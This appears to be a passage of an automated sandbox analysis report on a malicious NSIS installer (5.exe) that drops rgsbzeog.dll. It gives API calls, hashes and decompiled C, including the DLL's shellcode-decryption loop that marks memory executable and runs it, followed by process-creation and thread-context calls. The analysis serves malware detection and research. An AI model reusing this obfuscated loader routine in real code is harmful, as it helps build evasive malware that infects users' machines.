                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                              • String ID: "C:\Users\user\Desktop\5.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\5.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$`Ae$soft
                                                                                              • API String ID: 4283519449-2197865350
                                                                                              • Opcode ID: 0c7fdcf59c0fb2b92b8374371fd2f99e1dcbb6099d677134b975e3fd63279e42
                                                                                              • Instruction ID: 825a226a8dc595578503c7203fc5804032ed62a4dd83b14a28db2b62ef09ea34
                                                                                              • Opcode Fuzzy Hash: 0c7fdcf59c0fb2b92b8374371fd2f99e1dcbb6099d677134b975e3fd63279e42
                                                                                              • Instruction Fuzzy Hash: 0651D371900214ABDF20AF75DE89BAE7BA8EF04319F10457BF500B22D1C7B89D418B9D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E6F1DF530(void* __ecx) {
                                                                                              				_Unknown_base(*)()* _v8;
                                                                                              				_Unknown_base(*)()* _v12;
                                                                                              				intOrPtr _t12;
                                                                                              				char _t51;
                                                                                              				void* _t53;
                                                                                              				signed int _t89;
                                                                                              				signed int _t91;
                                                                                              				signed int _t123;
                                                                                              
                                                                                              				_t53 = __ecx;
                                                                                              				_v12 = GetProcAddress(LoadLibraryW(L"kernel32.dll"), "VirtualProtect");
                                                                                              				_v8 = GetProcAddress(LoadLibraryW(L"kernel32.dll"), "VirtualAlloc");
                                                                                              				 *0x6f1f7364 = VirtualAlloc(0, 0x11e1a300, 0x3000, 4);
                                                                                              				if( *0x6f1f7364 != 0) {
                                                                                              					_t12 =  *0x6f1f7364; // 0x2a80000
                                                                                              					E6F1DF900(_t53, _t12, 0x11e1a300);
                                                                                              					 *0x6f1f7360 = 0;
                                                                                              					while( *0x6f1f7360 < 0x13c5) {
                                                                                              						_t91 =  *0x6f1f7360; // 0x13c5
                                                                                              						_t4 =  &E6F1F2000 + _t91; // 0x6f000000
                                                                                              						 *0x6f1f7fe8 =  *_t4;
                                                                                              						 *0x6f1f7fe8 = ( *0x6f1f7fe8 & 0x000000ff) +  *0x6f1f7360;
                                                                                              						 *0x6f1f7fe8 =  !( *0x6f1f7fe8 & 0x000000ff);
                                                                                              						 *0x6f1f7fe8 = ( *0x6f1f7fe8 & 0x000000ff) +  *0x6f1f7360;
                                                                                              						 *0x6f1f7fe8 =  !( *0x6f1f7fe8 & 0x000000ff);
                                                                                              						 *0x6f1f7fe8 =  *0x6f1f7fe8 & 0x000000ff ^ 0x0000001b;
                                                                                              						 *0x6f1f7fe8 = ( *0x6f1f7fe8 & 0x000000ff) +  *0x6f1f7360;
                                                                                              						 *0x6f1f7fe8 = ( *0x6f1f7fe8 & 0x000000ff) >> 0x00000002 | ( *0x6f1f7fe8 & 0x000000ff) << 0x00000006;
                                                                                              						 *0x6f1f7fe8 =  !( *0x6f1f7fe8 & 0x000000ff);
                                                                                              						 *0x6f1f7fe8 = ( *0x6f1f7fe8 & 0x000000ff) + 0x63;
                                                                                              						 *0x6f1f7fe8 = ( *0x6f1f7fe8 & 0x000000ff) >> 0x00000005 | ( *0x6f1f7fe8 & 0x000000ff) << 0x00000003;
                                                                                              						 *0x6f1f7fe8 = ( *0x6f1f7fe8 & 0x000000ff) + 0xa2;
                                                                                              						 *0x6f1f7fe8 =  *0x6f1f7fe8 & 0x000000ff ^  *0x6f1f7360;
                                                                                              						 *0x6f1f7fe8 = ( *0x6f1f7fe8 & 0x000000ff) >> 0x00000005 | ( *0x6f1f7fe8 & 0x000000ff) << 0x00000003;
                                                                                              						 *0x6f1f7fe8 = ( *0x6f1f7fe8 & 0x000000ff) + 0x94;
                                                                                              						 *0x6f1f7fe8 =  !( *0x6f1f7fe8 & 0x000000ff);
                                                                                              						 *0x6f1f7fe8 = ( *0x6f1f7fe8 & 0x000000ff) +  *0x6f1f7360;
                                                                                              						 *0x6f1f7fe8 =  !( *0x6f1f7fe8 & 0x000000ff);
                                                                                              						 *0x6f1f7fe8 = ( *0x6f1f7fe8 & 0x000000ff) +  *0x6f1f7360;
                                                                                              						 *0x6f1f7fe8 =  ~( *0x6f1f7fe8 & 0x000000ff);
                                                                                              						 *0x6f1f7fe8 = ( *0x6f1f7fe8 & 0x000000ff) + 0x92;
                                                                                              						 *0x6f1f7fe8 =  !( *0x6f1f7fe8 & 0x000000ff);
                                                                                              						 *0x6f1f7fe8 = ( *0x6f1f7fe8 & 0x000000ff) >> 0x00000007 | ( *0x6f1f7fe8 & 0x000000ff) << 0x00000001;
                                                                                              						 *0x6f1f7fe8 =  *0x6f1f7fe8 & 0x000000ff ^  *0x6f1f7360;
                                                                                              						 *0x6f1f7fe8 =  ~( *0x6f1f7fe8 & 0x000000ff);
                                                                                              						 *0x6f1f7fe8 =  *0x6f1f7fe8 & 0x000000ff ^ 0x00000049;
                                                                                              						 *0x6f1f7fe8 = ( *0x6f1f7fe8 & 0x000000ff) - 0x6d;
                                                                                              						 *0x6f1f7fe8 =  !( *0x6f1f7fe8 & 0x000000ff);
                                                                                              						 *0x6f1f7fe8 =  *0x6f1f7fe8 & 0x000000ff ^ 0x00000098;
                                                                                              						 *0x6f1f7fe8 = ( *0x6f1f7fe8 & 0x000000ff) -  *0x6f1f7360;
                                                                                              						 *0x6f1f7fe8 =  !( *0x6f1f7fe8 & 0x000000ff);
                                                                                              						 *0x6f1f7fe8 = ( *0x6f1f7fe8 & 0x000000ff) -  *0x6f1f7360;
                                                                                              						 *0x6f1f7fe8 = ( *0x6f1f7fe8 & 0x000000ff) >> 0x00000003 | ( *0x6f1f7fe8 & 0x000000ff) << 0x00000005;
                                                                                              						 *0x6f1f7fe8 =  !( *0x6f1f7fe8 & 0x000000ff);
                                                                                              						 *0x6f1f7fe8 = ( *0x6f1f7fe8 & 0x000000ff) >> 0x00000007 | ( *0x6f1f7fe8 & 0x000000ff) << 0x00000001;
                                                                                              						 *0x6f1f7fe8 = ( *0x6f1f7fe8 & 0x000000ff) + 0xcd;
                                                                                              						 *0x6f1f7fe8 =  *0x6f1f7fe8 & 0x000000ff ^ 0x000000a5;
                                                                                              						 *0x6f1f7fe8 = ( *0x6f1f7fe8 & 0x000000ff) -  *0x6f1f7360;
                                                                                              						 *0x6f1f7fe8 =  !( *0x6f1f7fe8 & 0x000000ff);
                                                                                              						 *0x6f1f7fe8 =  ~( *0x6f1f7fe8 & 0x000000ff);
                                                                                              						 *0x6f1f7fe8 =  *0x6f1f7fe8 & 0x000000ff ^  *0x6f1f7360;
                                                                                              						_t123 =  *0x6f1f7360; // 0x13c5
                                                                                              						_t51 =  *0x6f1f7fe8; // 0x0
                                                                                              						 *((char*)( &E6F1F2000 + _t123)) = _t51;
                                                                                              						_t89 =  *0x6f1f7360; // 0x13c5
                                                                                              						 *0x6f1f7360 = _t89 + 1;
                                                                                              					}
                                                                                              					VirtualProtect( &E6F1F2000, 0x13c5, 0x40, 0x6f1f7fe4);
                                                                                              					E6F1F2000(); // executed
                                                                                              					return 0;
                                                                                              				}
                                                                                              				return 0;
                                                                                              			}












                                                                                              APIs
                                                                                              • LoadLibraryW.KERNEL32(kernel32.dll,VirtualProtect), ref: 6F1DF540
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6F1DF547
                                                                                              • LoadLibraryW.KERNEL32(kernel32.dll,VirtualAlloc), ref: 6F1DF55A
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6F1DF561
                                                                                              • VirtualAlloc.KERNEL32(00000000,11E1A300,00003000,00000004), ref: 6F1DF578
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc$AllocVirtual
                                                                                              • String ID: VirtualAlloc$VirtualProtect$kernel32.dll$kernel32.dll
                                                                                              • API String ID: 1786449878-3286849197
                                                                                              • Opcode ID: b154c96b4fed8138e62b8367961d22918d5e2acc897aaf96e27056e34e31d782
                                                                                              • Instruction ID: 77c1d7af3b5bd067cb76ea106acd5514b3936d466963a8683a6bcae1834c3bc9
                                                                                              • Opcode Fuzzy Hash: b154c96b4fed8138e62b8367961d22918d5e2acc897aaf96e27056e34e31d782
                                                                                              • Instruction Fuzzy Hash: BD91FD5402FAE09ADF0EE77A78A1D603FE157679F2718688BE4F5862C7C12442F4DB21
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 60%
                                                                                              			E00401734(FILETIME* __ebx, void* __eflags) {
                                                                                              				void* _t33;
                                                                                              				void* _t41;
                                                                                              				void* _t43;
                                                                                              				FILETIME* _t49;
                                                                                              				FILETIME* _t62;
                                                                                              				void* _t64;
                                                                                              				signed int _t70;
                                                                                              				FILETIME* _t71;
                                                                                              				FILETIME* _t75;
                                                                                              				signed int _t77;
                                                                                              				void* _t80;
                                                                                              				CHAR* _t82;
                                                                                              				void* _t85;
                                                                                              
                                                                                              				_t75 = __ebx;
                                                                                              				_t82 = E004029E8(0x31);
                                                                                              				 *(_t85 - 8) = _t82;
                                                                                              				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
                                                                                              				_t33 = E0040548B(_t82);
                                                                                              				_push(_t82);
                                                                                              				if(_t33 == 0) {
                                                                                              					lstrcatA(E0040541E(E0040592B(0x409b78, "C:\\Users\\alfons\\AppData\\Local\\Temp")), ??);
                                                                                              				} else {
                                                                                              					_push(0x409b78);
                                                                                              					E0040592B();
                                                                                              				}
                                                                                              				E00405B89(0x409b78);
                                                                                              				while(1) {
                                                                                              					__eflags =  *(_t85 + 8) - 3;
                                                                                              					if( *(_t85 + 8) >= 3) {
                                                                                              						_t64 = E00405C22(0x409b78);
                                                                                              						_t77 = 0;
                                                                                              						__eflags = _t64 - _t75;
                                                                                              						if(_t64 != _t75) {
                                                                                              							_t71 = _t64 + 0x14;
                                                                                              							__eflags = _t71;
                                                                                              							_t77 = CompareFileTime(_t71, _t85 - 0x18);
                                                                                              						}
                                                                                              						asm("sbb eax, eax");
                                                                                              						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                                                                                              						__eflags = _t70;
                                                                                              						 *(_t85 + 8) = _t70;
                                                                                              					}
                                                                                              					__eflags =  *(_t85 + 8) - _t75;
                                                                                              					if( *(_t85 + 8) == _t75) {
                                                                                              						E004055E3(0x409b78);
                                                                                              					}
                                                                                              					__eflags =  *(_t85 + 8) - 1;
                                                                                              					_t41 = E00405602(0x409b78, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                                                                                              					__eflags = _t41 - 0xffffffff;
                                                                                              					 *(_t85 - 0x34) = _t41;
                                                                                              					if(_t41 != 0xffffffff) {
                                                                                              						break;
                                                                                              					}
                                                                                              					__eflags =  *(_t85 + 8) - _t75;
                                                                                              					if( *(_t85 + 8) != _t75) {
                                                                                              						E00404CC9(0xffffffe2,  *(_t85 - 8));
                                                                                              						__eflags =  *(_t85 + 8) - 2;
                                                                                              						if(__eflags == 0) {
                                                                                              							 *((intOrPtr*)(_t85 - 4)) = 1;
                                                                                              						}
                                                                                              						L31:
                                                                                              						 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t85 - 4));
                                                                                              						__eflags =  *0x42ebe8;
                                                                                              						goto L32;
                                                                                              					} else {
                                                                                              						E0040592B(0x40a378, 0x42f000);
                                                                                              						E0040592B(0x42f000, 0x409b78);
                                                                                              						E0040594D(_t75, 0x40a378, 0x409b78, "C:\Users\alfons\AppData\Local\Temp\nswBB9.tmp\rgsbzeog.dll",  *((intOrPtr*)(_t85 - 0x10)));
                                                                                              						E0040592B(0x42f000, 0x40a378);
                                                                                              						_t62 = E004051EC("C:\Users\alfons\AppData\Local\Temp\nswBB9.tmp\rgsbzeog.dll",  *(_t85 - 0x24) >> 3) - 4;
                                                                                              						__eflags = _t62;
                                                                                              						if(_t62 == 0) {
                                                                                              							continue;
                                                                                              						} else {
                                                                                              							__eflags = _t62 == 1;
                                                                                              							if(_t62 == 1) {
                                                                                              								 *0x42ebe8 =  &( *0x42ebe8->dwLowDateTime);
                                                                                              								L32:
                                                                                              								_t49 = 0;
                                                                                              								__eflags = 0;
                                                                                              							} else {
                                                                                              								_push(0x409b78);
                                                                                              								_push(0xfffffffa);
                                                                                              								E00404CC9();
                                                                                              								L29:
                                                                                              								_t49 = 0x7fffffff;
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              					L33:
                                                                                              					return _t49;
                                                                                              				}
                                                                                              				E00404CC9(0xffffffea,  *(_t85 - 8));
                                                                                              				 *0x42ec14 =  *0x42ec14 + 1;
                                                                                              				_push(_t75);
                                                                                              				_push(_t75);
                                                                                              				_push( *(_t85 - 0x34));
                                                                                              				_push( *((intOrPtr*)(_t85 - 0x1c)));
                                                                                              				_t43 = E00402E44(); // executed
                                                                                              				 *0x42ec14 =  *0x42ec14 - 1;
                                                                                              				__eflags =  *(_t85 - 0x18) - 0xffffffff;
                                                                                              				_t80 = _t43;
                                                                                              				if( *(_t85 - 0x18) != 0xffffffff) {
                                                                                              					L22:
                                                                                              					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
                                                                                              				} else {
                                                                                              					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
                                                                                              					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
                                                                                              						goto L22;
                                                                                              					}
                                                                                              				}
                                                                                              				FindCloseChangeNotification( *(_t85 - 0x34)); // executed
                                                                                              				__eflags = _t80 - _t75;
                                                                                              				if(_t80 >= _t75) {
                                                                                              					goto L31;
                                                                                              				} else {
                                                                                              					__eflags = _t80 - 0xfffffffe;
                                                                                              					if(_t80 != 0xfffffffe) {
                                                                                              						E0040594D(_t75, _t80, 0x409b78, 0x409b78, 0xffffffee);
                                                                                              					} else {
                                                                                              						E0040594D(_t75, _t80, 0x409b78, 0x409b78, 0xffffffe9);
                                                                                              						lstrcatA(0x409b78,  *(_t85 - 8));
                                                                                              					}
                                                                                              					_push(0x200010);
                                                                                              					_push(0x409b78);
                                                                                              					E004051EC();
                                                                                              					goto L29;
                                                                                              				}
                                                                                              				goto L33;
                                                                                              			}

















                                                                                              APIs
                                                                                              • lstrcatA.KERNEL32(00000000,00000000,ivvzb,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
                                                                                              • CompareFileTime.KERNEL32(-00000014,?,ivvzb,ivvzb,00000000,00000000,ivvzb,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D
                                                                                                • Part of subcall function 0040592B: lstrcpynA.KERNEL32(?,?,00000400,00403151,qjsvdse Setup,NSIS Error), ref: 00405938
                                                                                                • Part of subcall function 00404CC9: lstrlenA.KERNEL32(004297B0,00000000,0041B694,7519EA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000,?), ref: 00404D02
                                                                                                • Part of subcall function 00404CC9: lstrlenA.KERNEL32(00402F9F,004297B0,00000000,0041B694,7519EA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000), ref: 00404D12
                                                                                                • Part of subcall function 00404CC9: lstrcatA.KERNEL32(004297B0,00402F9F,00402F9F,004297B0,00000000,0041B694,7519EA30), ref: 00404D25
                                                                                                • Part of subcall function 00404CC9: SetWindowTextA.USER32(004297B0,004297B0), ref: 00404D37
                                                                                                • Part of subcall function 00404CC9: SendMessageA.USER32 ref: 00404D5D
                                                                                                • Part of subcall function 00404CC9: SendMessageA.USER32 ref: 00404D77
                                                                                                • Part of subcall function 00404CC9: SendMessageA.USER32 ref: 00404D85
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nswBB9.tmp$C:\Users\user\AppData\Local\Temp\nswBB9.tmp\rgsbzeog.dll$ivvzb
                                                                                              • API String ID: 1941528284-530247106
                                                                                              • Opcode ID: 9637652f00c021062d2dbe4245cc16957b59b03da3b62afee8cfd87e020825ba
                                                                                              • Instruction ID: 57f74d31a3863b2a576bf3fc3f2571be4e71849821accf25204d9298bb77468e
                                                                                              • Opcode Fuzzy Hash: 9637652f00c021062d2dbe4245cc16957b59b03da3b62afee8cfd87e020825ba
                                                                                              • Instruction Fuzzy Hash: 6C41B471900515FACF10BBB5DD46EAF36A9EF01368B20433BF511B21E1D63C8E418AAE
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 95%
                                                                                              			E00402E44(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
                                                                                              				signed int _v8;
                                                                                              				long _v12;
                                                                                              				void* _v16;
                                                                                              				long _v20;
                                                                                              				long _v24;
                                                                                              				intOrPtr _v28;
                                                                                              				char _v92;
                                                                                              				void* _t67;
                                                                                              				void* _t68;
                                                                                              				long _t74;
                                                                                              				intOrPtr _t79;
                                                                                              				long _t80;
                                                                                              				void* _t82;
                                                                                              				int _t84;
                                                                                              				intOrPtr _t95;
                                                                                              				void* _t97;
                                                                                              				void* _t100;
                                                                                              				long _t101;
                                                                                              				signed int _t102;
                                                                                              				long _t103;
                                                                                              				int _t104;
                                                                                              				intOrPtr _t105;
                                                                                              				long _t106;
                                                                                              				void* _t107;
                                                                                              
                                                                                              				_t102 = _a16;
                                                                                              				_t97 = _a12;
                                                                                              				_v12 = _t102;
                                                                                              				if(_t97 == 0) {
                                                                                              					_v12 = 0x8000;
                                                                                              				}
                                                                                              				_v8 = _v8 & 0x00000000;
                                                                                              				_v16 = _t97;
                                                                                              				if(_t97 == 0) {
                                                                                              					_v16 = 0x418b80;
                                                                                              				}
                                                                                              				_t65 = _a4;
                                                                                              				if(_a4 >= 0) {
                                                                                              					_t95 =  *0x42ebb8; // 0x3591e
                                                                                              					E00403098(_t95 + _t65);
                                                                                              				}
                                                                                              				_t67 = E00403066( &_a16, 4); // executed
                                                                                              				if(_t67 == 0) {
                                                                                              					L34:
                                                                                              					_push(0xfffffffd);
                                                                                              					goto L35;
                                                                                              				} else {
                                                                                              					if((_a19 & 0x00000080) == 0) {
                                                                                              						if(_t97 == 0) {
                                                                                              							while(_a16 > 0) {
                                                                                              								_t103 = _v12;
                                                                                              								if(_a16 < _t103) {
                                                                                              									_t103 = _a16;
                                                                                              								}
                                                                                              								if(E00403066(0x414b80, _t103) == 0) {
                                                                                              									goto L34;
                                                                                              								} else {
                                                                                              									if(WriteFile(_a8, 0x414b80, _t103,  &_a12, 0) == 0 || _t103 != _a12) {
                                                                                              										L29:
                                                                                              										_push(0xfffffffe);
                                                                                              										L35:
                                                                                              										_pop(_t68);
                                                                                              										return _t68;
                                                                                              									} else {
                                                                                              										_v8 = _v8 + _t103;
                                                                                              										_a16 = _a16 - _t103;
                                                                                              										continue;
                                                                                              									}
                                                                                              								}
                                                                                              							}
                                                                                              							L45:
                                                                                              							return _v8;
                                                                                              						}
                                                                                              						if(_a16 < _t102) {
                                                                                              							_t102 = _a16;
                                                                                              						}
                                                                                              						if(E00403066(_t97, _t102) != 0) {
                                                                                              							_v8 = _t102;
                                                                                              							goto L45;
                                                                                              						} else {
                                                                                              							goto L34;
                                                                                              						}
                                                                                              					}
                                                                                              					_t74 = GetTickCount();
                                                                                              					 *0x40b4e4 =  *0x40b4e4 & 0x00000000;
                                                                                              					 *0x40b4e0 =  *0x40b4e0 & 0x00000000;
                                                                                              					_t14 =  &_a16;
                                                                                              					 *_t14 = _a16 & 0x7fffffff;
                                                                                              					_v20 = _t74;
                                                                                              					 *0x40afc8 = 8;
                                                                                              					 *0x414b70 = 0x40cb68;
                                                                                              					 *0x414b6c = 0x40cb68;
                                                                                              					 *0x414b68 = 0x414b68;
                                                                                              					_a4 = _a16;
                                                                                              					if( *_t14 <= 0) {
                                                                                              						goto L45;
                                                                                              					} else {
                                                                                              						goto L9;
                                                                                              					}
                                                                                              					while(1) {
                                                                                              						L9:
                                                                                              						_t104 = 0x4000;
                                                                                              						if(_a16 < 0x4000) {
                                                                                              							_t104 = _a16;
                                                                                              						}
                                                                                              						if(E00403066(0x414b80, _t104) == 0) {
                                                                                              							goto L34;
                                                                                              						}
                                                                                              						_a16 = _a16 - _t104;
                                                                                              						 *0x40afb8 = 0x414b80;
                                                                                              						 *0x40afbc = _t104;
                                                                                              						while(1) {
                                                                                              							_t100 = _v16;
                                                                                              							 *0x40afc0 = _t100;
                                                                                              							 *0x40afc4 = _v12;
                                                                                              							_t79 = E00405D23(0x40afb8);
                                                                                              							_v28 = _t79;
                                                                                              							if(_t79 < 0) {
                                                                                              								break;
                                                                                              							}
                                                                                              							_t105 =  *0x40afc0; // 0x41b694
                                                                                              							_t106 = _t105 - _t100;
                                                                                              							_t80 = GetTickCount();
                                                                                              							_t101 = _t80;
                                                                                              							if(( *0x42ec14 & 0x00000001) != 0 && (_t80 - _v20 > 0xc8 || _a16 == 0)) {
                                                                                              								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                                                                              								_t107 = _t107 + 0xc;
                                                                                              								E00404CC9(0,  &_v92);
                                                                                              								_v20 = _t101;
                                                                                              							}
                                                                                              							if(_t106 == 0) {
                                                                                              								if(_a16 > 0) {
                                                                                              									goto L9;
                                                                                              								}
                                                                                              								goto L45;
                                                                                              							} else {
                                                                                              								if(_a12 != 0) {
                                                                                              									_t82 =  *0x40afc0; // 0x41b694
                                                                                              									_v8 = _v8 + _t106;
                                                                                              									_v12 = _v12 - _t106;
                                                                                              									_v16 = _t82;
                                                                                              									L24:
                                                                                              									if(_v28 != 1) {
                                                                                              										continue;
                                                                                              									}
                                                                                              									goto L45;
                                                                                              								}
                                                                                              								_t84 = WriteFile(_a8, _v16, _t106,  &_v24, 0); // executed
                                                                                              								if(_t84 == 0 || _v24 != _t106) {
                                                                                              									goto L29;
                                                                                              								} else {
                                                                                              									_v8 = _v8 + _t106;
                                                                                              									goto L24;
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              						_push(0xfffffffc);
                                                                                              						goto L35;
                                                                                              					}
                                                                                              					goto L34;
                                                                                              				}
                                                                                              			}


                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 00402EAB
                                                                                              • GetTickCount.KERNEL32 ref: 00402F52
                                                                                              • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402F7B
                                                                                              • wsprintfA.USER32 ref: 00402F8B
                                                                                              • WriteFile.KERNEL32(00000000,00000000,0041B694,7FFFFFFF,00000000), ref: 00402FB9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: CountTick$FileWritewsprintf
                                                                                              • String ID: ... %d%%$ingTypeW
                                                                                              • API String ID: 4209647438-1588361529
                                                                                              • Opcode ID: 82a9aedbd2f3b533e53c55a0f3032eb9fe86cf46c86e88442e97a38cb8fe0156
                                                                                              • Instruction ID: 9e0124e4ae7d277b0b54c9942477664c6d45ab1b3c5c68ad5b6cbbf63d84754e
                                                                                              • Opcode Fuzzy Hash: 82a9aedbd2f3b533e53c55a0f3032eb9fe86cf46c86e88442e97a38cb8fe0156
                                                                                              • Instruction Fuzzy Hash: A5619E7180120ADBDF10DF65DA48A9F7BB8BB44365F10413BE910B72C4C778DA51DBAA
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateProcessW.KERNEL32(?,00000000), ref: 6F1F323F
                                                                                              • GetThreadContext.KERNEL32(?,00010007), ref: 6F1F3262
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: ContextCreateProcessThread
                                                                                              • String ID: D
                                                                                              • API String ID: 2843130473-2746444292
                                                                                              • Opcode ID: c9220ceb5afd7ae1c55745b9682b90ddab10de5a600337f464f58a91d5c72a72
                                                                                              • Instruction ID: 90e558c9943ddb4828b2eb7431aa72eb05ed8dd256ad0e19c84ec43f3c75cdb2
                                                                                              • Opcode Fuzzy Hash: c9220ceb5afd7ae1c55745b9682b90ddab10de5a600337f464f58a91d5c72a72
                                                                                              • Instruction Fuzzy Hash: 91A10571E45249EFDB44DFA8C981BAEBBF5BF08384F104169E515EB290D730AA62CF11
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 57%
                                                                                              			E00401F51(void* __ebx, void* __eflags) {
                                                                                              				struct HINSTANCE__* _t18;
                                                                                              				struct HINSTANCE__* _t25;
                                                                                              				void* _t26;
                                                                                              				struct HINSTANCE__* _t29;
                                                                                              				CHAR* _t31;
                                                                                              				intOrPtr* _t32;
                                                                                              				void* _t33;
                                                                                              
                                                                                              				_t26 = __ebx;
                                                                                              				asm("sbb eax, 0x42ec18");
                                                                                              				 *(_t33 - 4) = 1;
                                                                                              				if(__eflags < 0) {
                                                                                              					_push(0xffffffe7);
                                                                                              					L14:
                                                                                              					E00401423();
                                                                                              					L15:
                                                                                              					 *0x42ebe8 =  *0x42ebe8 +  *(_t33 - 4);
                                                                                              					return 0;
                                                                                              				}
                                                                                              				_t31 = E004029E8(0xfffffff0);
                                                                                              				 *(_t33 + 8) = E004029E8(1);
                                                                                              				if( *((intOrPtr*)(_t33 - 0x14)) == __ebx) {
                                                                                              					L3:
                                                                                              					_t18 = LoadLibraryExA(_t31, _t26, 8); // executed
                                                                                              					_t29 = _t18;
                                                                                              					if(_t29 == _t26) {
                                                                                              						_push(0xfffffff6);
                                                                                              						goto L14;
                                                                                              					}
                                                                                              					L4:
                                                                                              					_t32 = GetProcAddress(_t29,  *(_t33 + 8));
                                                                                              					if(_t32 == _t26) {
                                                                                              						E00404CC9(0xfffffff7,  *(_t33 + 8));
                                                                                              					} else {
                                                                                              						 *(_t33 - 4) = _t26;
                                                                                              						if( *((intOrPtr*)(_t33 - 0x1c)) == _t26) {
                                                                                              							 *_t32( *((intOrPtr*)(_t33 - 0x34)), 0x400, 0x42f000, 0x40af78, "��B"); // executed
                                                                                              						} else {
                                                                                              							E00401423( *((intOrPtr*)(_t33 - 0x1c)));
                                                                                              							if( *_t32() != 0) {
                                                                                              								 *(_t33 - 4) = 1;
                                                                                              							}
                                                                                              						}
                                                                                              					}
